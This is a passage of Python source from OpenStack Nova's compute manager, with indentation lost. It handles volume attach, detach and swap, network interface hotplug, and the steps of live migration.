do_driver_attach=True)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.exception("Failed to attach %(volume_id)s "
"at %(mountpoint)s",
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
instance=instance)
if bdm['attachment_id']:
self.volume_api.attachment_delete(context,
bdm['attachment_id'])
else:
self.volume_api.unreserve_volume(context, bdm.volume_id)
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_ATTACH,
phase=fields.NotificationPhase.ERROR,
exception=e,
volume_id=bdm.volume_id)
info = {'volume_id': bdm.volume_id}
self._notify_about_instance_usage(
context, instance, "volume.attach", extra_usage_info=info)
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_ATTACH,
phase=fields.NotificationPhase.END,
volume_id=bdm.volume_id)
def _notify_volume_usage_detach(self, context, instance, bdm):
if CONF.volume_usage_poll_interval <= 0:
return
mp = bdm.device_name
# Handle bootable volumes which will not contain /dev/
if '/dev/' in mp:
mp = mp[5:]
try:
vol_stats = self.driver.block_stats(instance, mp)
if vol_stats is None:
return
except NotImplementedError:
return
LOG.debug("Updating volume usage cache with totals", instance=instance)
rd_req, rd_bytes, wr_req, wr_bytes, flush_ops = vol_stats
vol_usage = objects.VolumeUsage(context)
vol_usage.volume_id = bdm.volume_id
vol_usage.instance_uuid = instance.uuid
vol_usage.project_id = instance.project_id
vol_usage.user_id = instance.user_id
vol_usage.availability_zone = instance.availability_zone
vol_usage.curr_reads = rd_req
vol_usage.curr_read_bytes = rd_bytes
vol_usage.curr_writes = wr_req
vol_usage.curr_write_bytes = wr_bytes
vol_usage.save(update_totals=True)
self.notifier.info(context, 'volume.usage',
compute_utils.usage_volume_info(vol_usage))
def _detach_volume(self, context, bdm, instance, destroy_bdm=True,
attachment_id=None):
"""Detach a volume from an instance.
:param context: security context
:param bdm: nova.objects.BlockDeviceMapping volume bdm to detach
:param instance: the Instance object to detach the volume from
:param destroy_bdm: if True, the corresponding BDM entry will be marked
as deleted. Disabling this is useful for operations
like rebuild, when we don't want to destroy BDM
:param attachment_id: The volume attachment_id for the given instance
and volume.
"""
volume_id = bdm.volume_id
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_DETACH,
phase=fields.NotificationPhase.START,
volume_id=volume_id)
self._notify_volume_usage_detach(context, instance, bdm)
LOG.info('Detaching volume %(volume_id)s',
{'volume_id': volume_id}, instance=instance)
driver_bdm = driver_block_device.convert_volume(bdm)
driver_bdm.detach(context, instance, self.volume_api, self.driver,
attachment_id=attachment_id, destroy_bdm=destroy_bdm)
info = dict(volume_id=volume_id)
self._notify_about_instance_usage(
context, instance, "volume.detach", extra_usage_info=info)
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_DETACH,
phase=fields.NotificationPhase.END,
volume_id=volume_id)
if 'tag' in bdm and bdm.tag:
self._delete_disk_metadata(instance, bdm)
if destroy_bdm:
bdm.destroy()
def _delete_disk_metadata(self, instance, bdm):
for device in instance.device_metadata.devices:
if isinstance(device, objects.DiskMetadata):
if 'serial' in device:
if device.serial == bdm.volume_id:
instance.device_metadata.devices.remove(device)
instance.save()
break
else:
# NOTE(artom) We log the entire device object because all
# fields are nullable and may not be set
LOG.warning('Unable to determine whether to clean up '
'device metadata for disk %s', device,
instance=instance)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def detach_volume(self, context, volume_id, instance, attachment_id):
"""Detach a volume from an instance.
:param context: security context
:param volume_id: the volume id
:param instance: the Instance object to detach the volume from
:param attachment_id: The volume attachment_id for the given instance
and volume.
"""
@utils.synchronized(instance.uuid)
def do_detach_volume(context, volume_id, instance, attachment_id):
bdm = objects.BlockDeviceMapping.get_by_volume_and_instance(
context, volume_id, instance.uuid)
self._detach_volume(context, bdm, instance,
attachment_id=attachment_id)
do_detach_volume(context, volume_id, instance, attachment_id)
def _init_volume_connection(self, context, new_volume,
old_volume_id, connector, bdm,
new_attachment_id, mountpoint):
new_volume_id = new_volume['id']
if new_attachment_id is None:
# We're dealing with an old-style attachment so initialize the
# connection so we can get the connection_info.
new_cinfo = self.volume_api.initialize_connection(context,
new_volume_id,
connector)
else:
# Check for multiattach on the new volume and if True, check to
# see if the virt driver supports multiattach.
# TODO(mriedem): This is copied from DriverVolumeBlockDevice
# and should be consolidated into some common code at some point.
vol_multiattach = new_volume.get('multiattach', False)
virt_multiattach = self.driver.capabilities['supports_multiattach']
if vol_multiattach and not virt_multiattach:
raise exception.MultiattachNotSupportedByVirtDriver(
volume_id=new_volume_id)
# This is a new style attachment and the API created the new
# volume attachment and passed the id to the compute over RPC.
# At this point we need to update the new volume attachment with
# the host connector, which will give us back the new attachment
# connection_info.
new_cinfo = self.volume_api.attachment_update(
context, new_attachment_id, connector,
mountpoint)['connection_info']
if vol_multiattach:
# This will be used by the volume driver to determine the
# proper disk configuration.
new_cinfo['multiattach'] = True
old_cinfo = jsonutils.loads(bdm['connection_info'])
if old_cinfo and 'serial' not in old_cinfo:
old_cinfo['serial'] = old_volume_id
# NOTE(lyarwood): serial is not always present in the returned
# connection_info so set it if it is missing as we do in
# DriverVolumeBlockDevice.attach().
if 'serial' not in new_cinfo:
new_cinfo['serial'] = new_volume_id
return (old_cinfo, new_cinfo)
def _swap_volume(self, context, instance, bdm, connector,
old_volume_id, new_volume, resize_to,
new_attachment_id, is_cinder_migration):
new_volume_id = new_volume['id']
mountpoint = bdm['device_name']
failed = False
new_cinfo = None
try:
old_cinfo, new_cinfo = self._init_volume_connection(
context, new_volume, old_volume_id, connector,
bdm, new_attachment_id, mountpoint)
# NOTE(lyarwood): The Libvirt driver, the only virt driver
# currently implementing swap_volume, will modify the contents of
# new_cinfo when connect_volume is called. This is then saved to
# the BDM in swap_volume for future use outside of this flow.
msg = ("swap_volume: Calling driver volume swap with "
"connection infos: new: %(new_cinfo)s; "
"old: %(old_cinfo)s" %
{'new_cinfo': new_cinfo, 'old_cinfo': old_cinfo})
# Both new and old info might contain password
LOG.debug(strutils.mask_password(msg), instance=instance)
self.driver.swap_volume(context, old_cinfo, new_cinfo, instance,
mountpoint, resize_to)
if new_attachment_id:
self.volume_api.attachment_complete(context, new_attachment_id)
msg = ("swap_volume: Driver volume swap returned, new "
"connection_info is now : %(new_cinfo)s" %
{'new_cinfo': new_cinfo})
LOG.debug(strutils.mask_password(msg))
except Exception as ex:
failed = True
with excutils.save_and_reraise_exception():
compute_utils.notify_about_volume_swap(
context, instance, self.host,
fields.NotificationAction.VOLUME_SWAP,
fields.NotificationPhase.ERROR,
old_volume_id, new_volume_id, ex)
if new_cinfo:
msg = ("Failed to swap volume %(old_volume_id)s "
"for %(new_volume_id)s")
LOG.exception(msg, {'old_volume_id': old_volume_id,
'new_volume_id': new_volume_id},
instance=instance)
else:
msg = ("Failed to connect to volume %(volume_id)s "
"with volume at %(mountpoint)s")
LOG.exception(msg, {'volume_id': new_volume_id,
'mountpoint': bdm['device_name']},
instance=instance)
# The API marked the volume as 'detaching' for the old volume
# so we need to roll that back so the volume goes back to
# 'in-use' state.
self.volume_api.roll_detaching(context, old_volume_id)
if new_attachment_id is None:
# The API reserved the new volume so it would be in
# 'attaching' status, so we need to unreserve it so it
# goes back to 'available' status.
self.volume_api.unreserve_volume(context, new_volume_id)
else:
# This is a new style attachment for the new volume, which
# was created in the API. We just need to delete it here
# to put the new volume back into 'available' status.
self.volume_api.attachment_delete(
context, new_attachment_id)
finally:
# TODO(mriedem): This finally block is terribly confusing and is
# trying to do too much. We should consider removing the finally
# block and move whatever needs to happen on success and failure
# into the blocks above for clarity, even if it means a bit of
# redundant code.
conn_volume = new_volume_id if failed else old_volume_id
if new_cinfo:
LOG.debug("swap_volume: removing Cinder connection "
"for volume %(volume)s", {'volume': conn_volume},
instance=instance)
if bdm.attachment_id is None:
# This is the pre-3.44 flow for new-style volume
# attachments so just terminate the connection.
self.volume_api.terminate_connection(context,
conn_volume,
connector)
else:
# This is a new style volume attachment. If we failed, then
# the new attachment was already deleted above in the
# exception block and we have nothing more to do here. If
# swap_volume was successful in the driver, then we need to
# "detach" the original attachment by deleting it.
if not failed:
self.volume_api.attachment_delete(
context, bdm.attachment_id)
# Need to make some decisions based on whether this was
# a Cinder initiated migration or not. The callback to
# migration completion isn't needed in the case of a
# nova initiated simple swap of two volume
# "volume-update" call so skip that. The new attachment
# scenarios will give us a new attachment record and
# that's what we want.
if bdm.attachment_id and not is_cinder_migration:
# we don't callback to cinder
comp_ret = {'save_volume_id': new_volume_id}
else:
# NOTE(lyarwood): The following call to
# os-migrate-volume-completion returns a dict containing
# save_volume_id, this volume id has two possible values :
# 1. old_volume_id if we are migrating (retyping) volumes
# 2. new_volume_id if we are swapping between two existing
# volumes
# This volume id is later used to update the volume_id and
# connection_info['serial'] of the BDM.
comp_ret = self.volume_api.migrate_volume_completion(
context,
old_volume_id,
new_volume_id,
error=failed)
LOG.debug("swap_volume: Cinder migrate_volume_completion "
"returned: %(comp_ret)s", {'comp_ret': comp_ret},
instance=instance)
return (comp_ret, new_cinfo)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def swap_volume(self, context, old_volume_id, new_volume_id, instance,
new_attachment_id):
"""Swap volume for an instance."""
context = context.elevated()
compute_utils.notify_about_volume_swap(
context, instance, self.host,
fields.NotificationAction.VOLUME_SWAP,
fields.NotificationPhase.START,
old_volume_id, new_volume_id)
bdm = objects.BlockDeviceMapping.get_by_volume_and_instance(
context, old_volume_id, instance.uuid)
connector = self.driver.get_volume_connector(instance)
resize_to = 0
old_volume = self.volume_api.get(context, old_volume_id)
# Yes this is a tightly-coupled state check of what's going on inside
# cinder, but we need this while we still support old (v1/v2) and
# new style attachments (v3.44). Once we drop support for old style
# attachments we could think about cleaning up the cinder-initiated
# swap volume API flows.
is_cinder_migration = (
True if old_volume['status'] in ('retyping',
'migrating') else False)
old_vol_size = old_volume['size']
new_volume = self.volume_api.get(context, new_volume_id)
new_vol_size = new_volume['size']
if new_vol_size > old_vol_size:
resize_to = new_vol_size
LOG.info('Swapping volume %(old_volume)s for %(new_volume)s',
{'old_volume': old_volume_id, 'new_volume': new_volume_id},
instance=instance)
comp_ret, new_cinfo = self._swap_volume(context,
instance,
bdm,
connector,
old_volume_id,
new_volume,
resize_to,
new_attachment_id,
is_cinder_migration)
# NOTE(lyarwood): Update the BDM with the modified new_cinfo and
# correct volume_id returned by Cinder.
save_volume_id = comp_ret['save_volume_id']
new_cinfo['serial'] = save_volume_id
values = {
'connection_info': jsonutils.dumps(new_cinfo),
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': save_volume_id,
'no_device': None}
if resize_to:
values['volume_size'] = resize_to
if new_attachment_id is not None:
# This was a volume swap for a new-style attachment so we
# need to update the BDM attachment_id for the new attachment.
values['attachment_id'] = new_attachment_id
LOG.debug("swap_volume: Updating volume %(volume_id)s BDM record with "
"%(updates)s", {'volume_id': bdm.volume_id,
'updates': values},
instance=instance)
bdm.update(values)
bdm.save()
compute_utils.notify_about_volume_swap(
context, instance, self.host,
fields.NotificationAction.VOLUME_SWAP,
fields.NotificationPhase.END,
old_volume_id, new_volume_id)
@wrap_exception()
def remove_volume_connection(self, context, volume_id, instance):
"""Remove the volume connection on this host
Detach the volume from this instance on this host, and if this is
the cinder v2 flow, call cinder to terminate the connection.
"""
try:
bdm = objects.BlockDeviceMapping.get_by_volume_and_instance(
context, volume_id, instance.uuid)
driver_bdm = driver_block_device.convert_volume(bdm)
driver_bdm.driver_detach(context, instance,
self.volume_api, self.driver)
if bdm.attachment_id is None:
# cinder v2 api flow
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id,
connector)
except exception.NotFound:
pass
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def attach_interface(self, context, instance, network_id, port_id,
requested_ip, tag):
"""Use hotplug to add an network adapter to an instance."""
if not self.driver.capabilities['supports_attach_interface']:
raise exception.AttachInterfaceNotSupported(
instance_uuid=instance.uuid)
if (tag and not
self.driver.capabilities.get('supports_tagged_attach_interface',
False)):
raise exception.NetworkInterfaceTaggedAttachNotSupported()
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_ATTACH,
phase=fields.NotificationPhase.START)
bind_host_id = self.driver.network_binding_host_id(context, instance)
network_info = self.network_api.allocate_port_for_instance(
context, instance, port_id, network_id, requested_ip,
bind_host_id=bind_host_id, tag=tag)
if len(network_info) != 1:
LOG.error('allocate_port_for_instance returned %(ports)s '
'ports', {'ports': len(network_info)})
# TODO(elod.illes): an instance.interface_attach.error notification
# should be sent here
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
image_meta = objects.ImageMeta.from_instance(instance)
try:
self.driver.attach_interface(context, instance, image_meta,
network_info[0])
except exception.NovaException as ex:
port_id = network_info[0].get('id')
LOG.warning("attach interface failed , try to deallocate "
"port %(port_id)s, reason: %(msg)s",
{'port_id': port_id, 'msg': ex},
instance=instance)
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception:
LOG.warning("deallocate port %(port_id)s failed",
{'port_id': port_id}, instance=instance)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_ATTACH,
phase=fields.NotificationPhase.ERROR,
exception=ex)
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_ATTACH,
phase=fields.NotificationPhase.END)
return network_info[0]
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def detach_interface(self, context, instance, port_id):
"""Detach a network adapter from an instance."""
network_info = instance.info_cache.network_info
condemned = None
for vif in network_info:
if vif['id'] == port_id:
condemned = vif
break
if condemned is None:
raise exception.PortNotFound(_("Port %s is not "
"attached") % port_id)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_DETACH,
phase=fields.NotificationPhase.START)
try:
self.driver.detach_interface(context, instance, condemned)
except exception.NovaException as ex:
# If the instance was deleted before the interface was detached,
# just log it at debug.
log_level = (logging.DEBUG
if isinstance(ex, exception.InstanceNotFound)
else logging.WARNING)
LOG.log(log_level,
"Detach interface failed, port_id=%(port_id)s, reason: "
"%(msg)s", {'port_id': port_id, 'msg': ex},
instance=instance)
raise exception.InterfaceDetachFailed(instance_uuid=instance.uuid)
else:
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
# Since this is a cast operation, log the failure for
# triage.
LOG.warning('Failed to deallocate port %(port_id)s '
'for instance. Error: %(error)s',
{'port_id': port_id, 'error': ex},
instance=instance)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_DETACH,
phase=fields.NotificationPhase.END)
def _get_compute_info(self, context, host):
return objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host)
@wrap_exception()
def check_instance_shared_storage(self, ctxt, instance, data):
"""Check if the instance files are shared
:param ctxt: security context
:param instance: dict of instance data
:param data: result of driver.check_instance_shared_storage_local
Returns True if instance disks located on shared storage and
False otherwise.
"""
return self.driver.check_instance_shared_storage_remote(ctxt, data)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
if None, calculate it in driver
:param disk_over_commit: if true, allow disk over commit
if None, ignore disk usage checking
:returns: a dict containing migration info
"""
return self._do_check_can_live_migrate_destination(ctxt, instance,
block_migration,
disk_over_commit)
def _do_check_can_live_migrate_destination(self, ctxt, instance,
block_migration,
disk_over_commit):
src_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, instance.host))
dst_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, CONF.host))
dest_check_data = self.driver.check_can_live_migrate_destination(ctxt,
instance, src_compute_info, dst_compute_info,
block_migration, disk_over_commit)
LOG.debug('destination check data is %s', dest_check_data)
try:
migrate_data = self.compute_rpcapi.\
check_can_live_migrate_source(ctxt, instance,
dest_check_data)
finally:
self.driver.cleanup_live_migration_destination_check(ctxt,
dest_check_data)
return migrate_data
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param ctxt: security context
:param instance: dict of instance data
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, instance.uuid)
is_volume_backed = compute_utils.is_volume_backed_instance(
ctxt, instance, bdms)
dest_check_data.is_volume_backed = is_volume_backed
block_device_info = self._get_instance_block_device_info(
ctxt, instance, refresh_conn_info=False, bdms=bdms)
result = self.driver.check_can_live_migrate_source(ctxt, instance,
dest_check_data,
block_device_info)
LOG.debug('source check data is %s', result)
return result
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def pre_live_migration(self, context, instance, block_migration, disk,
migrate_data):
"""Preparations for live migration at dest host.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param disk: disk info of instance
:param migrate_data: A dict or LiveMigrateData object holding data
required for live migration without shared
storage.
:returns: migrate_data containing additional migration info
"""
LOG.debug('pre_live_migration data is %s', migrate_data)
migrate_data.old_vol_attachment_ids = {}
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.start",
network_info=network_info)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.LIVE_MIGRATION_PRE,
phase=fields.NotificationPhase.START, bdms=bdms)
connector = self.driver.get_volume_connector(instance)
try:
for bdm in bdms:
if bdm.is_volume and bdm.attachment_id is not None:
# This bdm uses the new cinder v3.44 API.
# We will create a new attachment for this
# volume on this migration destination host. The old
# attachment will be deleted on the source host
# when the migration succeeds. The old attachment_id
# is stored in dict with the key being the bdm.volume_id
# so it can be restored on rollback.
#
# Also note that attachment_update is not needed as we
# are providing the connector in the create call.
attach_ref = self.volume_api.attachment_create(
context, bdm.volume_id, bdm.instance_uuid,
connector=connector, mountpoint=bdm.device_name)
# save current attachment so we can detach it on success,
# or restore it on a rollback.
migrate_data.old_vol_attachment_ids[bdm.volume_id] = \
bdm.attachment_id
# update the bdm with the new attachment_id.
bdm.attachment_id = attach_ref['id']
bdm.save()
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True,
bdms=bdms)
migrate_data = self.driver.pre_live_migration(context,
instance,
block_device_info,
network_info,
disk,
migrate_data)
LOG.debug('driver pre_live_migration data is %s', migrate_data)
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host)
# Creating filters to hypervisors and firewalls.
# An example is that nova-instance-instance-xxx,
# which is written to libvirt.xml(Check "virsh nwfilter-list")
# This nwfilter is necessary on the destination host.
# In addition, this method is creating filtering rule
# onto destination host.
self.driver.ensure_filtering_rules_for_instance(instance,
network_info)
except Exception:
# If we raise, migrate_data with the updated attachment ids
# will not be returned to the source host for rollback.
# So we need to rollback new attachments here.
with excutils.save_and_reraise_exception():
old_attachments = migrate_data.old_vol_attachment_ids
for bdm in bdms:
if (bdm.is_volume and bdm.attachment_id is not None and
bdm.volume_id in old_attachments):
self.volume_api.attachment_delete(context,
bdm.attachment_id)
bdm.attachment_id = old_attachments[bdm.volume_id]
bdm.save()
# Volume connections are complete, tell cinder that all the
# attachments have completed.
for bdm in bdms:
if bdm.is_volume and bdm.attachment_id is not None:
self.volume_api.attachment_complete(context,
bdm.attachment_id)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.end",
network_info=network_info)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.LIVE_MIGRATION_PRE,
phase=fields.NotificationPhase.END, bdms=bdms)
LOG.debug('pre_live_migration result data is %s', migrate_data)
return migrate_data
@staticmethod
def _neutron_failed_live_migration_callback(event_name, instance):
msg = ('Neutron reported failure during live migration '
'with %(event)s for instance %(uuid)s')
msg_args = {'event': event_name, 'uuid': instance.uuid}
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfacePlugException(msg % msg_args)
LOG.error(msg, msg_args)
@staticmethod
def _get_neutron_events_for_live_migration(instance):
# We don't generate events if CONF.vif_plugging_timeout=0
# or if waiting during live migration is disabled,
# meaning that the operator disabled using them.
if (CONF.vif_plugging_timeout and utils.is_neutron() and
CONF.compute.live_migration_wait_for_vif_plug):
return [('network-vif-plugged', vif['id'])
for vif in instance.get_network_info()]
else:
return []
def _cleanup_pre_live_migration(self, context, dest, instance,
migration, migrate_data):
"""Helper method for when pre_live_migration fails
Sets the migration status to "error" and rolls back the live migration
setup on the destination host.
:param context: The user request context.
:type context: nova.context.RequestContext
:param dest: The live migration destination hostname.
:type dest: str
:param instance: The instance being live migrated.
:type instance: nova.objects.Instance
:param migration: The migration record tracking this live migration.
:type migration: nova.objects.Migration
:param migrate_data: Data about the live migration, populated from
the destination host.
:type migrate_data: Subclass of nova.objects.LiveMigrateData
"""
self._set_migration_status(migration, 'error')
# Make sure we set this for _rollback_live_migration()
# so it can find it, as expected if it was called later
migrate_data.migration = migration
self._rollback_live_migration(context, instance, dest,
migrate_data)
def _do_live_migration(self, context, dest, instance, block_migration,
migration, migrate_data):
# NOTE(danms): We should enhance the RT to account for migrations
# and use the status field to denote when the accounting has been
# done on source/destination. For now, this is just here for status
# reporting
self._set_migration_status(migration, 'preparing')
events = self._get_neutron_events_for_live_migration(instance)
try:
if ('block_migration' in migrate_data and
migrate_data.block_migration):
block_device_info = self._get_instance_block_device_info(
context, instance)
disk = self.driver.get_instance_disk_info(
instance, block_device_info=block_device_info)
else:
disk = None
deadline = CONF.vif_plugging_timeout
error_cb = self._neutron_failed_live_migration_callback
# In order to avoid a race with the vif plugging that the virt
# driver does on the destination host, we register our events
# to wait for before calling pre_live_migration.
with self.virtapi.wait_for_instance_event(
instance, events, deadline=deadline,
error_callback=error_cb):
migrate_data = self.compute_rpcapi.pre_live_migration(
context, instance,
block_migration, disk, dest, migrate_data)
except exception.VirtualInterfacePlugException:
with excutils.save_and_reraise_exception():
LOG.exception('Failed waiting for network virtual interfaces '
'to be plugged on the destination host %s.',
dest, instance=instance)
self._cleanup_pre_live_migration(
context, dest, instance, migration, migrate_data)
except eventlet.timeout.Timeout:
msg = 'Timed out waiting for events: %s'
LOG.warning(msg, events, instance=instance)
if CONF.vif_plugging_is_fatal:
self._cleanup_pre_live_migration(
context, dest, instance, migration, migrate_data)
raise exception.MigrationError(reason=msg % events)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception('Pre live migration failed at %s',
dest, instance=instance)
self._cleanup_pre_live_migration(
context, dest, instance, migration, migrate_data)
self._set_migration_status(migration, 'running')
if migrate_data:
migrate_data.migration = migration
LOG.debug('live_migration data is %s', migrate_data)
try:
self.driver.live_migration(context, instance, dest,
self._post_live_migration,
self._rollback_live_migration,
block_migration, migrate_data)
except Exception:
LOG.exception('Live migration failed.', instance=instance)
with excutils.save_and_reraise_exception():
# Put instance and migration into error state,
# as its almost certainly too late to rollback
self._set_migration_status(migration, 'error')
# first refresh instance as it may have got updated by
# post_live_migration_at_destination
instance.refresh()
self._set_instance_obj_error_state(context, instance,
clean_task_state=True)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def live_migration(self, context, dest, instance, block_migration,
migration, migrate_data):
"""Executing live migration.
:param context: security context
:param dest: destination host
:param instance: a nova.objects.instance.Instance object
:param block_migration: if true, prepare for block migration
:param migration: an nova.objects.Migration object
:param migrate_data: implementation specific params
"""
self._set_migration_status(migration, 'queued')
def dispatch_live_migration(*args, **kwargs):
with self._live_migration_semaphore:
self._do_live_migration(*args, **kwargs)
# NOTE(danms): We spawn here to return the RPC worker thread back to
# the pool. Since what follows could take a really long time, we don't
# want to tie up RPC workers.
self.instance_running_pool.spawn_n(dispatch_live_migration,
context, dest, instance,
block_migration, migration,
migrate_data)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def live_migration_force_complete(self, context, instance):
"""Force live migration to complete.
:param context: Security context
:param instance: The instance that is being migrated
"""
self._notify_about_instance_usage(
context, instance, 'live.migration.force.complete.start')
self.driver.live_migration_force_complete(instance)
self._notify_about_instance_usage(
context, instance, 'live.migration.force.complete.end')
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def live_migration_abort(self, context, instance, migration_id):
"""Abort an in-progress live migration.
:param context: Security context
:param instance: The instance that is being migrated
:param migration_id: ID of in-progress live migration
"""
migration = objects.Migration.get_by_id(context, migration_id)
if migration.status != 'running':
raise exception.InvalidMigrationState(migration_id=migration_id,
instance_uuid=instance.uuid,
state=migration.status,
method='abort live migration')
self._notify_about_instance_usage(
context, instance, 'live.migration.abort.start')
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.LIVE_MIGRATION_ABORT,
phase=fields.NotificationPhase.START)
self.driver.live_migration_abort(instance)
self._notify_about_instance_usage(
context, instance, 'live.migration.abort.end')
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.LIVE_MIGRATION_ABORT,
phase=fields.NotificationPhase.END)
def _live_migration_cleanup_flags(self, migrate_data):
"""Determine whether disks or instance path need to be cleaned up after
live migration (at source on success, at destination on rollback)
Block migration needs empty image at destination host before migration
starts, so if any failure occurs, any empty images has to be deleted.
Also Volume backed live migration w/o shared storage needs to delete
newly created instance-xxx dir on the destination as a part of its
rollback process
:param migrate_data: implementation specific data
:returns: (bool, bool) -- do_cleanup, destroy_disks
"""
# NOTE(pkoniszewski): block migration specific params are set inside
# migrate_data objects for drivers that expose block live migration
# information (i.e. Libvirt, Xenapi and HyperV). For other drivers
# cleanup is not needed.
is_shared_block_storage = True
is_shared_instance_path = True
if isinstance(migrate_data, migrate_data_obj.LibvirtLiveMigrateData):
is_shared_block_storage = migrate_data.is_shared_block_storage
is_shared_instance_path = migrate_data.is_shared_instance_path
elif isinstance(migrate_data, migrate_data_obj.XenapiLiveMigrateData):
is_shared_block_storage = not migrate_data.block_migration
is_shared_instance_path = not migrate_data.block_migration
elif isinstance(migrate_data, migrate_data_obj.HyperVLiveMigrateData):
is_shared_instance_path = migrate_data.is_shared_instance_path
is_shared_block_storage = migrate_data.is_shared_instance_path
# No instance booting at source host, but instance dir
# must be deleted for preparing next block migration
# must be deleted for preparing next live migration w/o shared storage
do_cleanup = not is_shared_instance_path
destroy_disks = not is_shared_block_storage
return (do_cleanup, destroy_disks)
@wrap_exception()
@wrap_instance_fault
def _post_live_migration(self, ctxt, instance,
dest, block_migration=False, migrate_data=None):
"""Post operations for live migration.
This method is called from live_migration
and mainly updating database record.
:param ctxt: security context
:param instance: instance dict
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which has data
required for live migration without shared storage
"""
LOG.info('_post_live_migration() is started..',
instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, instance.uuid)
# Cleanup source host post live-migration
block_device_info = self._get_instance_block_device_info(
ctxt, instance, bdms=bdms)
self.driver.post_live_migration(ctxt, instance, block_device_info,
migrate_data)
# Detaching volumes.
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
if bdm.is_volume:
# Detaching volumes is a call to an external API that can fail.
# If it does, we need to handle it gracefully so that the call
# to post_live_migration_at_destination - where we set instance
# host and task state - still happens. We need to rethink the
# current approach of setting instance host and task state
# AFTER a whole bunch of things that could fail in unhandled
# ways, but that is left as a TODO(artom).
try:
if bdm.attachment_id is None:
# Prior to cinder v3.44:
# We don't want to actually mark the volume detached,
# or delete the bdm, just remove the connection from
# this host.
#
# remove the volume connection without detaching from
# hypervisor because the instance is not running
# anymore on the current host
self.volume_api.terminate_connection(ctxt,
bdm.volume_id,
connector)
else:
# cinder v3.44 api flow - delete the old attachment
# for the source host
old_attachment_id = \
migrate_data.old_vol_attachment_ids[bdm.volume_id]
self.volume_api.attachment_delete(ctxt,
old_attachment_id)
except Exception as e:
if bdm.attachment_id is None:
LOG.error('Connection for volume %s not terminated on '
'source host %s during post_live_migration: '
'%s', bdm.volume_id, self.host,
six.text_type(e), instance=instance)
else:
LOG.error('Volume attachment %s not deleted on source '
'host %s during post_live_migration: %s',
old_attachment_id, self.host,
six.text_type(e), instance=instance)
# Releasing vlan.
# (not necessary in current implementation?)
network_info = self.network_api.get_instance_nw_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.start",
network_info=network_info)
# Releasing security group ingress rule.
LOG.debug('Calling driver.unfilter_instance from _post_live_migration',
instance=instance)
self.driver.unfilter_instance(instance,
network_info)
migration = {'source_compute': self.host,
'dest_compute': dest, }
self.network_api.migrate_instance_start(ctxt,
instance,
migration)
destroy_vifs = False
try:
self.driver.post_live_migration_at_source(ctxt, instance,
network_info)
except NotImplementedError as ex:
LOG.debug(ex, instance=instance)
# For all hypervisors other than libvirt, there is a possibility
# they are unplugging networks from source node in the cleanup
# method
destroy_vifs = True
# NOTE(danms): Save source node before calling post method on
# destination, which will update it
source_node = instance.node
# Define domain at destination host, without doing it,
# pause/suspend/terminate do not work.
